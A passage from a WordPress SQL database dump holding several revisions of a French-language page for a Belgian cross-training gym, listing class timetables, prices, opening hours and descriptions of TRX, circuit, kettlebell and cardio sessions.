underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:26:59', '2013-07-03 16:26:59', '', 11, 'http://www.crosstrainingcenter.be/?p=163', 0, 'revision', '', 0),
(164, 1, '2013-07-03 16:27:40', '2013-07-03 16:27:40', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td class=\"ttitre\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:27:40', '2013-07-03 16:27:40', '', 11, 'http://www.crosstrainingcenter.be/?p=164', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(167, 1, '2013-07-03 16:30:33', '2013-07-03 16:30:33', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:30:33', '2013-07-03 16:30:33', '', 11, 'http://www.crosstrainingcenter.be/?p=167', 0, 'revision', '', 0),
(168, 1, '2013-07-03 16:32:37', '2013-07-03 16:32:37', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de 